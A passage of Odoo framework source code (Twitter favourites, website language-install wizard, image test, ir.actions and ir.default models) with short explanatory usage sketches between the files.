'screen_name': website.twitter_screen_name,
})
_logger.debug("Found new favorite: %r, %r", tweet_id, tweet_dict)
tweet_ids.append(new_tweet.id)
return tweet_ids
def _get_access_token(self, website):
"""Obtain a bearer token."""
r = requests.post(
REQUEST_TOKEN_URL,
data={'grant_type': 'client_credentials',},
auth=(website.twitter_api_key, website.twitter_api_secret),
timeout=URLOPEN_TIMEOUT,
)
r.raise_for_status()
data = r.json()
access_token = data['access_token']
return access_token
```
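The model above uses Twitter's application-only OAuth2 flow: `_get_access_token` exchanges the API key/secret for a bearer token, which `_request` then sends when fetching the favourites list. A standalone sketch of the same two HTTP calls with `requests`; the key, secret and screen name are placeholders to replace with real credentials.

```python
# Standalone sketch of the token + favorites flow used above; credentials are placeholders.
import requests

API_ENDPOINT = 'https://api.twitter.com'
token = requests.post(
    '%s/oauth2/token' % API_ENDPOINT,
    data={'grant_type': 'client_credentials'},
    auth=('my_api_key', 'my_api_secret'),
    timeout=10,
).json()['access_token']

favorites = requests.get(
    '%s/1.1/favorites/list.json' % API_ENDPOINT,
    params={'screen_name': 'odoo'},
    headers={'Authorization': 'Bearer %s' % token},
    timeout=10,
).json()
print(len(favorites), 'favorite tweets fetched')
```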
#### File: website/wizard/base_language_install.py
```python
from odoo import api, fields, models
class BaseLanguageInstall(models.TransientModel):
_inherit = "base.language.install"
website_ids = fields.Many2many('website', string='Websites to translate')
@api.model
def default_get(self, fields):
defaults = super(BaseLanguageInstall, self).default_get(fields)
website_id = self._context.get('params', {}).get('website_id')
if website_id:
if 'website_ids' not in defaults:
defaults['website_ids'] = []
defaults['website_ids'].append(website_id)
return defaults
@api.multi
def lang_install(self):
action = super(BaseLanguageInstall, self).lang_install()
lang = self.env['res.lang'].search([('code', '=', self.lang)], limit=1)
if self.website_ids and lang:
self.website_ids.write({'language_ids': [(4, lang.id)]})
params = self._context.get('params', {})
if 'url_return' in params:
return {
'url': params['url_return'].replace('[lang]', self.lang),
'type': 'ir.actions.act_url',
'target': 'self'
}
return action
```
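The wizard above picks the target website up from `context['params']` in `default_get`, and `lang_install` both activates the language on those websites and, when `url_return` is given, redirects with `[lang]` substituted. A usage sketch, assuming an Odoo environment; the website id, language code and return URL are illustrative.

```python
# Sketch, assuming an Odoo environment; values are illustrative.
wizard = env['base.language.install'].with_context(
    params={'website_id': 1, 'url_return': '/[lang]/shop'},
).create({'lang': 'fr_FR'})
action = wizard.lang_install()
# The language is now in website 1's language_ids; because url_return was given,
# `action` is an ir.actions.act_url redirect with [lang] already substituted.
print(action)
```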
#### File: web/tests/test_image.py
```python
import io
from PIL import Image
from odoo.tests.common import HttpCase
class TestImage(HttpCase):
def test_01_content_image_resize_placeholder(self):
response = self.url_open('/web/image/0/200x150')
image = Image.open(io.BytesIO(response.content))
self.assertEqual(image.size, (200, 150))
response = self.url_open('/web/image/fake/0/image_small')
image = Image.open(io.BytesIO(response.content))
self.assertEqual(image.size, (64, 64))
```
#### File: base/models/ir_actions.py
```python
import odoo
from odoo import api, fields, models, tools, SUPERUSER_ID, _
from odoo.exceptions import MissingError, UserError, ValidationError, AccessError
from odoo.osv import expression
from odoo.tools.safe_eval import safe_eval, test_python_expr
from odoo.tools import pycompat, wrap_module
from odoo.http import request
import base64
from collections import defaultdict
import datetime
import logging
import time
from pytz import timezone
_logger = logging.getLogger(__name__)
# build dateutil helper, starting with the relevant *lazy* imports
import dateutil
import dateutil.parser
import dateutil.relativedelta
import dateutil.rrule
import dateutil.tz
mods = {'parser', 'relativedelta', 'rrule', 'tz'}
attribs = {atr for m in mods for atr in getattr(dateutil, m).__all__}
dateutil = wrap_module(dateutil, mods | attribs)
class IrActions(models.Model):
_name = 'ir.actions.actions'
_description = 'Actions'
_table = 'ir_actions'
_order = 'name'
name = fields.Char(required=True)
type = fields.Char(string='Action Type', required=True)
xml_id = fields.Char(compute='_compute_xml_id', string="External ID")
help = fields.Html(string='Action Description',
help='Optional help text for the users with a description of the target view, such as its usage and purpose.',
translate=True)
binding_model_id = fields.Many2one('ir.model', ondelete='cascade',
help="Setting a value makes this action available in the sidebar for the given model.")
binding_type = fields.Selection([('action', 'Action'),
('action_form_only', "Form-only"),
('report', 'Report')],
required=True, default='action')
def _compute_xml_id(self):
res = self.get_external_id()
for record in self:
record.xml_id = res.get(record.id)
@api.model_create_multi
def create(self, vals_list):
res = super(IrActions, self).create(vals_list)
# self.get_bindings() depends on action records
self.clear_caches()
return res
@api.multi
def write(self, vals):
res = super(IrActions, self).write(vals)
# self.get_bindings() depends on action records
self.clear_caches()
return res
@api.multi
def unlink(self):
"""unlink ir.action.todo which are related to actions which will be deleted.
NOTE: ondelete cascade will not work on ir.actions.actions so we will need to do it manually."""
todos = self.env['ir.actions.todo'].search([('action_id', 'in', self.ids)])
todos.unlink()
res = super(IrActions, self).unlink()
# self.get_bindings() depends on action records
self.clear_caches()
return res
@api.model
def _get_eval_context(self, action=None):
""" evaluation context to pass to safe_eval """
return {
'uid': self._uid,
'user': self.env.user,
'time': time,
'datetime': datetime,
'dateutil': dateutil,
'timezone': timezone,
'b64encode': base64.b64encode,
'b64decode': base64.b64decode,
}
@api.model
@tools.ormcache('frozenset(self.env.user.groups_id.ids)', 'model_name')
def get_bindings(self, model_name):
""" Retrieve the list of actions bound to the given model.
:return: a dict mapping binding types to a list of dict describing
actions, where the latter is given by calling the method
``read`` on the action record.
"""
cr = self.env.cr
query = """ SELECT a.id, a.type, a.binding_type
FROM ir_actions a, ir_model m
WHERE a.binding_model_id=m.id AND m.model=%s
ORDER BY a.id """
cr.execute(query, [model_name])
# discard unauthorized actions, and read action definitions
result = defaultdict(list)
user_groups = self.env.user.groups_id
for action_id, action_model, binding_type in cr.fetchall():
try:
action = self.env[action_model].browse(action_id)
action_groups = getattr(action, 'groups_id', ())
if action_groups and not action_groups & user_groups:
# the user may not perform this action
continue
result[binding_type].append(action.read()[0])
except (AccessError, MissingError):
continue
return result
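# Usage sketch (hypothetical, not from the original file): fetch the actions bound
# to a model, e.g. from an Odoo shell.
#
#   bindings = env['ir.actions.actions'].get_bindings('res.partner')
#   bindings['action']   # read() dicts of sidebar/contextual actions
#   bindings['report']   # read() dicts of bound reports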
class IrActionsActWindow(models.Model):
_name = 'ir.actions.act_window'
_description = 'Action Window'
_table = 'ir_act_window'
_inherit = 'ir.actions.actions'
_sequence = 'ir_actions_id_seq'
_order = 'name'
@api.constrains('res_model', 'src_model')
def _check_model(self):
for action in self:
if action.res_model not in self.env:
raise ValidationError(_('Invalid model name %r in action definition.') % action.res_model)
if action.src_model and action.src_model not in self.env:
raise ValidationError(_('Invalid model name %r in action definition.') % action.src_model)
@api.depends('view_ids.view_mode', 'view_mode', 'view_id.type')
def _compute_views(self):
""" Compute an ordered list of the specific view modes that should be
enabled when displaying the result of this action, along with the
ID of the specific view to use for each mode, if any were required.
This function hides the logic of determining the precedence between
the view_modes string, the view_ids o2m, and the view_id m2o that
can be set on the action.
"""
for act in self:
act.views = [(view.view_id.id, view.view_mode) for view in act.view_ids]
got_modes = [view.view_mode for view in act.view_ids]
all_modes = act.view_mode.split(',')
missing_modes = [mode for mode in all_modes if mode not in got_modes]
if missing_modes:
if act.view_id.type in missing_modes:
# reorder missing modes to put view_id first if present
missing_modes.remove(act.view_id.type)
act.views.append((act.view_id.id, act.view_id.type))
act.views.extend([(False, mode) for mode in missing_modes])
@api.depends('res_model', 'search_view_id')
def _compute_search_view(self):
for act in self:
fvg = self.env[act.res_model].fields_view_get(act.search_view_id.id, 'search')
act.search_view = str(fvg)
name = fields.Char(string='Action Name', translate=True)
type = fields.Char(default="ir.actions.act_window")
view_id = fields.Many2one('ir.ui.view', string='View Ref.', ondelete='set null')
domain = fields.Char(string='Domain Value',
help="Optional domain filtering of the destination data, as a Python expression")
context = fields.Char(string='Context Value', default={}, required=True,
help="Context dictionary as Python expression, empty by default (Default: {})")
res_id = fields.Integer(string='Record ID', help="Database ID of record to open in form view, when ``view_mode`` is set to 'form' only")
res_model = fields.Char(string='Destination Model', required=True,
help="Model name of the object to open in the view window")
src_model = fields.Char(string='Source Model',
help="Optional model name of the objects on which this action should be visible")
target = fields.Selection([('current', 'Current Window'), ('new', 'New Window'), ('inline', 'Inline Edit'), ('fullscreen', 'Full Screen'), ('main', 'Main action of Current Window')], default="current", string='Target Window')
view_mode = fields.Char(required=True, default='tree,form',
help="Comma-separated list of allowed view modes, such as 'form', 'tree', 'calendar', etc. (Default: tree,form)")
view_type = fields.Selection([('tree', 'Tree'), ('form', 'Form')], default="form", string='View Type', required=True,
help="View type: Tree type to use for the tree view, set to 'tree' for a hierarchical tree view, or 'form' for a regular list view")
usage = fields.Char(string='Action Usage',
help="Used to filter menu and home actions from the user form.")
view_ids = fields.One2many('ir.actions.act_window.view', 'act_window_id', string='No of Views')
views = fields.Binary(compute='_compute_views',
help="This function field computes the ordered list of views that should be enabled " \
"when displaying the result of an action, federating view mode, views and " \
"reference view. The result is returned as an ordered list of pairs (view_id,view_mode).")
limit = fields.Integer(default=80, help='Default limit for the list view')
groups_id = fields.Many2many('res.groups', 'ir_act_window_group_rel',
'act_id', 'gid', string='Groups')
search_view_id = fields.Many2one('ir.ui.view', string='Search View Ref.')
filter = fields.Boolean()
auto_search = fields.Boolean(default=True)
search_view = fields.Text(compute='_compute_search_view')
multi = fields.Boolean(string='Restrict to lists', help="If checked and the action is bound to a model, it will only appear in the More menu on list views")
@api.multi
def read(self, fields=None, load='_classic_read'):
""" call the method get_empty_list_help of the model and set the window action help message
"""
result = super(IrActionsActWindow, self).read(fields, load=load)
if not fields or 'help' in fields:
for values in result:
model = values.get('res_model')
if model in self.env:
eval_ctx = dict(self.env.context)
try:
ctx = safe_eval(values.get('context', '{}'), eval_ctx)
except:
ctx = {}
values['help'] = self.with_context(**ctx).env[model].get_empty_list_help(values.get('help', ''))
return result
@api.model
def for_xml_id(self, module, xml_id):
""" Returns the act_window object created for the provided xml_id
:param module: the module the act_window originates in
:param xml_id: the namespace-less id of the action (the @id
attribute from the XML file)
:return: A read() view of the ir.actions.act_window
"""
record = self.env.ref("%s.%s" % (module, xml_id))
return record.read()[0]
@api.model_create_multi
def create(self, vals_list):
self.clear_caches()
return super(IrActionsActWindow, self).create(vals_list)
@api.multi
def unlink(self):
self.clear_caches()
return super(IrActionsActWindow, self).unlink()
@api.multi
def exists(self):
ids = self._existing()
existing = self.filtered(lambda rec: rec.id in ids)
if len(existing) < len(self):
# mark missing records in cache with a failed value
exc = MissingError(
_("Record does not exist or has been deleted.")
+ '\n\n({} {}, {} {})'.format(_('Records:'), (self - existing).ids[:6], _('User:'), self._uid)
)
for record in (self - existing):
record._cache.set_failed(self._fields, exc)
return existing
@api.model
@tools.ormcache()
def _existing(self):
self._cr.execute("SELECT id FROM %s" % self._table)
return set(row[0] for row in self._cr.fetchall())
VIEW_TYPES = [
('tree', 'Tree'),
('form', 'Form'),
('graph', 'Graph'),
('pivot', 'Pivot'),
('calendar', 'Calendar'),
('gantt', 'Gantt'),
('kanban', 'Kanban'),
]
class IrActionsActWindowView(models.Model):
_name = 'ir.actions.act_window.view'
_description = 'Action Window View'
_table = 'ir_act_window_view'
_rec_name = 'view_id'
_order = 'sequence,id'
sequence = fields.Integer()
view_id = fields.Many2one('ir.ui.view', string='View')
view_mode = fields.Selection(VIEW_TYPES, string='View Type', required=True)
act_window_id = fields.Many2one('ir.actions.act_window', string='Action', ondelete='cascade')
multi = fields.Boolean(string='On Multiple Doc.', help="If set to true, the action will not be displayed on the right toolbar of a form view.")
@api.model_cr_context
def _auto_init(self):
res = super(IrActionsActWindowView, self)._auto_init()
tools.create_unique_index(self._cr, 'act_window_view_unique_mode_per_action',
self._table, ['act_window_id', 'view_mode'])
return res
class IrActionsActWindowclose(models.Model):
_name = 'ir.actions.act_window_close'
_description = 'Action Window Close'
_inherit = 'ir.actions.actions'
_table = 'ir_actions'
type = fields.Char(default='ir.actions.act_window_close')
class IrActionsActUrl(models.Model):
_name = 'ir.actions.act_url'
_description = 'Action URL'
_table = 'ir_act_url'
_inherit = 'ir.actions.actions'
_sequence = 'ir_actions_id_seq'
_order = 'name'
name = fields.Char(string='Action Name', translate=True)
type = fields.Char(default='ir.actions.act_url')
url = fields.Text(string='Action URL', required=True)
target = fields.Selection([('new', 'New Window'), ('self', 'This Window')],
string='Action Target', default='new', required=True)
class IrActionsServer(models.Model):
""" Server actions model. Server action work on a base model and offer various
type of actions that can be executed automatically, for example using base
action rules, of manually, by adding the action in the 'More' contextual
menu.
Since Odoo 8.0 a button 'Create Menu Action' button is available on the
action form view. It creates an entry in the More menu of the base model.
This allows to create server actions and run them in mass mode easily through
the interface.
The available actions are :
- 'Execute Python Code': a block of python code that will be executed
- 'Create a new Record': create a new record with new values
- 'Write on a Record': update the values of a record
- 'Execute several actions': define an action that triggers several other
server actions
"""
_name = 'ir.actions.server'
_description = 'Server Actions'
_table = 'ir_act_server'
_inherit = 'ir.actions.actions'
_sequence = 'ir_actions_id_seq'
_order = 'sequence,name'
DEFAULT_PYTHON_CODE = """# Available variables:
# - env: Odoo Environment on which the action is triggered
# - model: Odoo Model of the record on which the action is triggered; is a void recordset
# - record: record on which the action is triggered; may be void
# - records: recordset of all records on which the action is triggered in multi-mode; may be void
# - time, datetime, dateutil, timezone: useful Python libraries
# - log: log(message, level='info'): logging function to record debug information in ir.logging table
# - Warning: Warning Exception to use with raise
# To return an action, assign: action = {...}\n\n\n\n"""
@api.model
def _select_objects(self):
records = self.env['ir.model'].search([])
return [(record.model, record.name) for record in records] + [('', '')]
name = fields.Char(string='Action Name', translate=True)
type = fields.Char(default='ir.actions.server')
usage = fields.Selection([
('ir_actions_server', 'Server Action'),
('ir_cron', 'Scheduled Action')], string='Usage',
default='ir_actions_server', required=True)
state = fields.Selection([
('code', 'Execute Python Code'),
('object_create', 'Create a new Record'),
('object_write', 'Update the Record'),
('multi', 'Execute several actions')], string='Action To Do',
default='object_write', required=True,
help="Type of server action. The following values are available:\n"
"- 'Execute Python Code': a block of python code that will be executed\n"
"- 'Create': create a new record with new values\n"
"- 'Update a Record': update the values of a record\n"
"- 'Execute several actions': define an action that triggers several other server actions\n"
"- 'Send Email': automatically send an email (Discuss)\n"
"- 'Add Followers': add followers to a record (Discuss)\n"
"- 'Create Next Activity': create an activity (Discuss)")
# Generic
sequence = fields.Integer(default=5,
help="When dealing with multiple actions, the execution order is "
"based on the sequence. Low number means high priority.")
model_id = fields.Many2one('ir.model', string='Model', required=True, ondelete='cascade',
help="Model on which the server action runs.")
model_name = fields.Char(related='model_id.model', string='Model Name', readonly=True, store=True)
# Python code
code = fields.Text(string='Python Code', groups='base.group_system',
default=DEFAULT_PYTHON_CODE,
help="Write Python code that the action will execute. Some variables are "
"available for use; help about python expression is given in the help tab.")
# Multi
child_ids = fields.Many2many('ir.actions.server', 'rel_server_actions', 'server_id', 'action_id',
string='Child Actions', help='Child server actions that will be executed. Note that the last returned action value will be used as the global return value.')
# Create
crud_model_id = fields.Many2one('ir.model', string='Create/Write Target Model',
oldname='srcmodel_id', help="Model for record creation / update. Set this field only to specify a different model than the base model.")
crud_model_name = fields.Char(related='crud_model_id.model', string='Target Model', readonly=True)
link_field_id = fields.Many2one('ir.model.fields', string='Link using field',
help="Provide the field used to link the newly created record "
"on the record on used by the server action.")
fields_lines = fields.One2many('ir.server.object.lines', 'server_id', string='Value Mapping', copy=True)
@api.constrains('code')
def _check_python_code(self):
for action in self.sudo().filtered('code'):
msg = test_python_expr(expr=action.code.strip(), mode="exec")
if msg:
raise ValidationError(msg)
@api.constrains('child_ids')
def _check_recursion(self):
if not self._check_m2m_recursion('child_ids'):
raise ValidationError(_('Recursion found in child server actions'))
@api.onchange('crud_model_id')
def _onchange_crud_model_id(self):
self.link_field_id = False
self.crud_model_name = self.crud_model_id.model
@api.onchange('model_id')
def _onchange_model_id(self):
self.model_name = self.model_id.model
@api.multi
def create_action(self):
""" Create a contextual action for each server action. """
for action in self:
action.write({'binding_model_id': action.model_id.id,
'binding_type': 'action'})
return True
@api.multi
def unlink_action(self):
""" Remove the contextual actions created for the server actions. """
self.check_access_rights('write', raise_exception=True)
self.filtered('binding_model_id').write({'binding_model_id': False})
return True
@api.model
def run_action_code_multi(self, action, eval_context=None):
safe_eval(action.sudo().code.strip(), eval_context, mode="exec", nocopy=True) # nocopy allows to return 'action'
if 'action' in eval_context:
return eval_context['action']
@api.model
def run_action_multi(self, action, eval_context=None):
res = False
for act in action.child_ids:
result = act.run()
if result:
res = result
return res
@api.model
def run_action_object_write(self, action, eval_context=None):
"""Apply specified write changes to active_id."""
res = {}
for exp in action.fields_lines:
res[exp.col1.name] = exp.eval_value(eval_context=eval_context)[exp.id]
if self._context.get('onchange_self'):
record_cached = self._context['onchange_self']
for field, new_value in res.items():
record_cached[field] = new_value
else:
self.env[action.model_id.model].browse(self._context.get('active_id')).write(res)
@api.model
def run_action_object_create(self, action, eval_context=None):
"""Create specified model object with specified values.
If applicable, link active_id.<self.link_field_id> to the new record.
"""
res = {}
for exp in action.fields_lines:
res[exp.col1.name] = exp.eval_value(eval_context=eval_context)[exp.id]
res = self.env[action.crud_model_id.model].create(res)
if action.link_field_id:
record = self.env[action.model_id.model].browse(self._context.get('active_id'))
record.write({action.link_field_id.name: res.id})
@api.model
def _get_eval_context(self, action=None):
""" Prepare the context used when evaluating python code, like the
python formulas or code server actions.
:param action: the current server action
:type action: browse record
:returns: dict -- evaluation context given to safe_eval """
def log(message, level="info"):
with self.pool.cursor() as cr:
cr.execute("""
INSERT INTO ir_logging(create_date, create_uid, type, dbname, name, level, message, path, line, func)
VALUES (NOW() at time zone 'UTC', %s, %s, %s, %s, %s, %s, %s, %s, %s)
""", (self.env.uid, 'server', self._cr.dbname, __name__, level, message, "action", action.id, action.name))
eval_context = super(IrActionsServer, self)._get_eval_context(action=action)
model_name = action.model_id.sudo().model
model = self.env[model_name]
record = None
records = None
if self._context.get('active_model') == model_name and self._context.get('active_id'):
record = model.browse(self._context['active_id'])
if self._context.get('active_model') == model_name and self._context.get('active_ids'):
records = model.browse(self._context['active_ids'])
if self._context.get('onchange_self'):
record = self._context['onchange_self']
eval_context.update({
# orm
'env': self.env,
'model': model,
# Exceptions
'Warning': odoo.exceptions.Warning,
# record
'record': record,
'records': records,
# helpers
'log': log,
})
return eval_context
@api.multi
def run(self):
""" Runs the server action. For each server action, the
run_action_<STATE> method is called. This allows easy overriding
of the server actions.
:param dict context: context should contain following keys
- active_id: id of the current object (single mode)
- active_model: current model that should equal the action's model
The following keys are optional:
- active_ids: ids of the current records (mass mode). If active_ids
and active_id are present, active_ids is given precedence.
:return: an action_id to be executed, or False if the action finished correctly
without returning an action
"""
res = False
for action in self:
eval_context = self._get_eval_context(action)
if hasattr(self, 'run_action_%s_multi' % action.state):
# call the multi method
run_self = self.with_context(eval_context['env'].context)
func = getattr(run_self, 'run_action_%s_multi' % action.state)
res = func(action, eval_context=eval_context)
elif hasattr(self, 'run_action_%s' % action.state):
active_id = self._context.get('active_id')
if not active_id and self._context.get('onchange_self'):
active_id = self._context['onchange_self']._origin.id
if not active_id: # onchange on new record
func = getattr(self, 'run_action_%s' % action.state)
res = func(action, eval_context=eval_context)
active_ids = self._context.get('active_ids', [active_id] if active_id else [])
for active_id in active_ids:
# run context dedicated to a particular active_id
run_self = self.with_context(active_ids=[active_id], active_id=active_id)
eval_context["env"].context = run_self._context
# call the single method related to the action: run_action_<STATE>
func = getattr(run_self, 'run_action_%s' % action.state)
res = func(action, eval_context=eval_context)
return res
@api.model
def _run_actions(self, ids):
"""
Run server actions with given ids.
Allow crons to run specific server actions
"""
return self.browse(ids).run()
class IrServerObjectLines(models.Model):
_name = 'ir.server.object.lines'
_description = 'Server Action value mapping'
_sequence = 'ir_actions_id_seq'
server_id = fields.Many2one('ir.actions.server', string='Related Server Action', ondelete='cascade')
col1 = fields.Many2one('ir.model.fields', string='Field', required=True)
value = fields.Text(required=True, help="Expression containing a value specification. \n"
"When Formula type is selected, this field may be a Python expression "
" that can use the same values as for the code field on the server action.\n"
"If Value type is selected, the value will be used directly without evaluation.")
type = fields.Selection([
('value', 'Value'),
('reference', 'Reference'),
('equation', 'Python expression')
], 'Evaluation Type', default='value', required=True, change_default=True)
resource_ref = fields.Reference(
string='Record', selection='_selection_target_model',
compute='_compute_resource_ref', inverse='_set_resource_ref')
@api.model
def _selection_target_model(self):
models = self.env['ir.model'].search([])
return [(model.model, model.name) for model in models]
@api.depends('col1.relation', 'value', 'type')
def _compute_resource_ref(self):
for line in self:
if line.type in ['reference', 'value'] and line.col1 and line.col1.relation:
value = line.value or ''
try:
value = int(value)
if not self.env[line.col1.relation].browse(value).exists():
record = self.env[line.col1.relation]._search([], limit=1)
value = record[0] if record else 0
except ValueError:
record = self.env[line.col1.relation]._search([], limit=1)
value = record[0] if record else 0
line.resource_ref = '%s,%s' % (line.col1.relation, value)
else:
line.resource_ref = False
@api.onchange('resource_ref')
def _set_resource_ref(self):
for line in self.filtered(lambda line: line.type == 'reference'):
if line.resource_ref:
line.value = str(line.resource_ref.id)
@api.multi
def eval_value(self, eval_context=None):
result = dict.fromkeys(self.ids, False)
for line in self:
expr = line.value
if line.type == 'equation':
expr = safe_eval(line.value, eval_context)
elif line.col1.ttype in ['many2one', 'integer']:
try:
expr = int(line.value)
except Exception:
pass
result[line.id] = expr
return result
class IrActionsTodo(models.Model):
"""
Configuration Wizards
"""
_name = 'ir.actions.todo'
_description = "Configuration Wizards"
_order = "sequence, id"
action_id = fields.Many2one('ir.actions.actions', string='Action', required=True, index=True)
sequence = fields.Integer(default=10)
state = fields.Selection([('open', 'To Do'), ('done', 'Done')], string='Status', default='open', required=True)
name = fields.Char()
@api.model_create_multi
def create(self, vals_list):
todos = super(IrActionsTodo, self).create(vals_list)
for todo in todos:
if todo.state == "open":
self.ensure_one_open_todo()
return todos
@api.multi
def write(self, vals):
res = super(IrActionsTodo, self).write(vals)
if vals.get('state', '') == 'open':
self.ensure_one_open_todo()
return res
@api.model
def ensure_one_open_todo(self):
open_todo = self.search([('state', '=', 'open')], order='sequence asc, id desc', offset=1)
if open_todo:
open_todo.write({'state': 'done'})
@api.multi
def name_get(self):
return [(record.id, record.action_id.name) for record in self]
@api.multi
def unlink(self):
if self:
try:
todo_open_menu = self.env.ref('base.open_menu')
# don't remove base.open_menu todo but set its original action
if todo_open_menu in self:
todo_open_menu.action_id = self.env.ref('base.action_client_base_menu').id
self -= todo_open_menu
except ValueError:
pass
return super(IrActionsTodo, self).unlink()
@api.model
def _name_search(self, name, args=None, operator='ilike', limit=100, name_get_uid=None):
args = args or []
if name:
action_ids = self._search(expression.AND([[('action_id', operator, name)], args]), limit=limit, access_rights_uid=name_get_uid)
return self.browse(action_ids).name_get()
return super(IrActionsTodo, self)._name_search(name, args=args, operator=operator, limit=limit, name_get_uid=name_get_uid)
@api.multi
def action_launch(self):
""" Launch Action of Wizard"""
self.ensure_one()
self.write({'state': 'done'})
# Load action
action_type = self.action_id.type
action = self.env[action_type].browse(self.action_id.id)
result = action.read()[0]
if action_type != 'ir.actions.act_window':
return result
result.setdefault('context', '{}')
# Open a specific record when res_id is provided in the context
ctx = safe_eval(result['context'], {'user': self.env.user})
if ctx.get('res_id'):
result['res_id'] = ctx.pop('res_id')
# disable log for automatic wizards
ctx['disable_log'] = True
result['context'] = ctx
return result
@api.multi
def action_open(self):
""" Sets configuration wizard in TODO state"""
return self.write({'state': 'open'})
class IrActionsActClient(models.Model):
_name = 'ir.actions.client'
_description = 'Client Action'
_inherit = 'ir.actions.actions'
_table = 'ir_act_client'
_sequence = 'ir_actions_id_seq'
_order = 'name'
name = fields.Char(string='Action Name', translate=True)
type = fields.Char(default='ir.actions.client')
tag = fields.Char(string='Client action tag', required=True,
help="An arbitrary string, interpreted by the client"
" according to its own needs and wishes. There "
"is no central tag repository across clients.")
target = fields.Selection([('current', 'Current Window'), ('new', 'New Window'), ('fullscreen', 'Full Screen'), ('main', 'Main action of Current Window')], default="current", string='Target Window')
res_model = fields.Char(string='Destination Model', help="Optional model, mostly used for needactions.")
context = fields.Char(string='Context Value', default="{}", required=True, help="Context dictionary as Python expression, empty by default (Default: {})")
params = fields.Binary(compute='_compute_params', inverse='_inverse_params', string='Supplementary arguments',
help="Arguments sent to the client along with "
"the view tag")
params_store = fields.Binary(string='Params storage', readonly=True)
@api.depends('params_store')
def _compute_params(self):
self_bin = self.with_context(bin_size=False, bin_size_params_store=False)
for record, record_bin in pycompat.izip(self, self_bin):
record.params = record_bin.params_store and safe_eval(record_bin.params_store, {'uid': self._uid})
def _inverse_params(self):
for record in self:
params = record.params
record.params_store = repr(params) if isinstance(params, dict) else params
def _get_default_form_view(self):
doc = super(IrActionsActClient, self)._get_default_form_view()
params = doc.find(".//field[@name='params']")
params.getparent().remove(params)
params_store = doc.find(".//field[@name='params_store']")
params_store.getparent().remove(params_store)
return doc
```
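`DEFAULT_PYTHON_CODE` and `_get_eval_context` above define what a Python server action can use (`env`, `model`, `record`/`records`, `log`, `Warning`, the date helpers), and `run()` dispatches to the matching `run_action_<state>` method. A hedged sketch of defining and running such an action, assuming an Odoo environment; the action name, target model and field written by the code are illustrative.

```python
# Sketch, assuming an Odoo environment; the code string only uses names exposed
# by _get_eval_context above (records, log).
partner_model = env['ir.model'].search([('model', '=', 'res.partner')], limit=1)
action = env['ir.actions.server'].create({
    'name': 'Flag selected partners as companies',
    'model_id': partner_model.id,
    'state': 'code',
    'code': (
        "for rec in records:\n"
        "    rec.write({'is_company': True})\n"
        "log('%d partner(s) updated' % len(records))"
    ),
})
partners = env['res.partner'].search([], limit=5)
action.with_context(active_model='res.partner', active_ids=partners.ids).run()
```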
#### File: base/models/ir_default.py
```python
import json
from odoo import api, fields, models, tools, _
from odoo.exceptions import ValidationError
class IrDefault(models.Model):
""" User-defined default values for fields. """
_name = 'ir.default'
_description = 'Default Values'
_rec_name = 'field_id'
field_id = fields.Many2one('ir.model.fields', string="Field", required=True,
ondelete='cascade', index=True)
user_id = fields.Many2one('res.users', string='User', ondelete='cascade', index=True,
help="If set, action binding only applies for this user.")
company_id = fields.Many2one('res.company', string='Company', ondelete='cascade', index=True,
help="If set, action binding only applies for this company")
condition = fields.Char('Condition', help="If set, applies the default upon condition.")
json_value = fields.Char('Default Value (JSON format)', required=True)
@api.model_create_multi
def create(self, vals_list):
self.clear_caches()
return super(IrDefault, self).create(vals_list)
@api.multi
def write(self, vals):
if self:
self.clear_caches()
return super(IrDefault, self).write(vals)
@api.multi
def unlink(self):
if self:
self.clear_caches()
return super(IrDefault, self).unlink()
@api.model
def set(self, model_name, field_name, value, user_id=False, company_id=False, condition=False):
""" Defines a default value for the given field. Any entry for the same
scope (field, user, company) will be replaced. The value is encoded
in JSON to be stored to the database.
:param user_id: may be ``False`` for all users, ``True`` for the
current user, or any user id
:param company_id: may be ``False`` for all companies, ``True`` for
the current user's company, or any company id
:param condition: optional condition that restricts the
applicability of the default value; this is an
opaque string, but the client typically uses
single-field conditions in the form ``'key=val'``.
"""
if user_id is True:
user_id = self.env.uid
if company_id is True:
company_id = self.env.user.company_id.id
# check consistency of model_name, field_name, and value
try:
model = self.env[model_name]
field = model._fields[field_name]
field.convert_to_cache(value, model)
json_value = json.dumps(value, ensure_ascii=False)
except KeyError:
raise ValidationError(_("Invalid field %s.%s") % (model_name, field_name))
except Exception:
raise ValidationError(_("Invalid value for %s.%s: %s") % (model_name, field_name, value))
# update existing default for the same scope, or create one
field = self.env['ir.model.fields']._get(model_name, field_name)
default = self.search([
('field_id', '=', field.id),
('user_id', '=', user_id),
('company_id', '=', company_id),
('condition', '=', condition),
])
if default:
default.write({'json_value': json_value})
else:
self.create({
'field_id': field.id,
'user_id': user_id,
'company_id': company_id,
'condition': condition,
'json_value': json_value,
})
return True
@api.model
def get(self, model_name, field_name, user_id=False, company_id=False, condition=False):
""" Return the default value for the given field, user and company, or
``None`` if no default is available.
:param user_id: may be ``False`` for all users, ``True`` for the
current user, or any user id
:param company_id: may be ``False`` for all companies, ``True`` for
the current user's company, or any company id
:param condition: optional condition that restricts the
applicability of the default value; this is an
opaque string, but the client typically uses
single-field conditions in the form ``'key=val'``.
"""
if user_id is True:
user_id = self.env.uid
if company_id is True:
company_id = self.env.user.company_id.id
field = self.env['ir.model.fields']._get(model_name, field_name)
default = self.search([
('field_id', '=', field.id),
('user_id', '=', user_id),
('company_id', '=', company_id),
('condition', '=', condition),
], limit=1)
return json.loads(default.json_value) if default else None
@api.model
@tools.ormcache('self.env.uid', 'model_name', 'condition')
# Note about ormcache invalidation: it is not needed when deleting a field,
# a user, or a company, as the corresponding defaults will no longer be
# requested. It must only be done when a user's company is modified.
def get_model_defaults(self, model_name, condition=False):
""" Return the available default values for the given model (for the
current user), as a dict mapping field names to values.
"""
cr = self.env.cr
query = """ SELECT f.name, d.json_value FROM ir_default d
JOIN ir_model_fields f ON d.field_id=f.id
JOIN res_users u ON u.id=%s
WHERE f.model=%s
AND (d.user_id IS NULL OR d.user_id=u.id)
AND (d.company_id IS NULL OR d.company_id=u.company_id)
AND {}
ORDER BY d.user_id, d.company_id, d.id
"""
params = [self.env.uid, model_name]
if condition:
query = query.format("d.condition=%s")
params.append(condition)
else:
query = query.format("d.condition IS NULL")
cr.execute(query, params)
result = {}
for row in cr.fetchall():
# keep the highest priority default for each field
if row[0] not in result:
result[row[0]] = json.loads(row[1])
return result
@api.model
def discard_records(self, records):
""" Discard all the defaults of many2one fields using any of the given
records.
"""
json_vals = [json.dumps(id) for id in records.ids]
domain = [('field_id.ttype', '=', 'many2one'),
('field_id.relation', '=', records._name),
('json_value', 'in', json_vals)]
return self.search(domain).unlink()
@api.model
def discard_values(self, model_name, field_name, values):
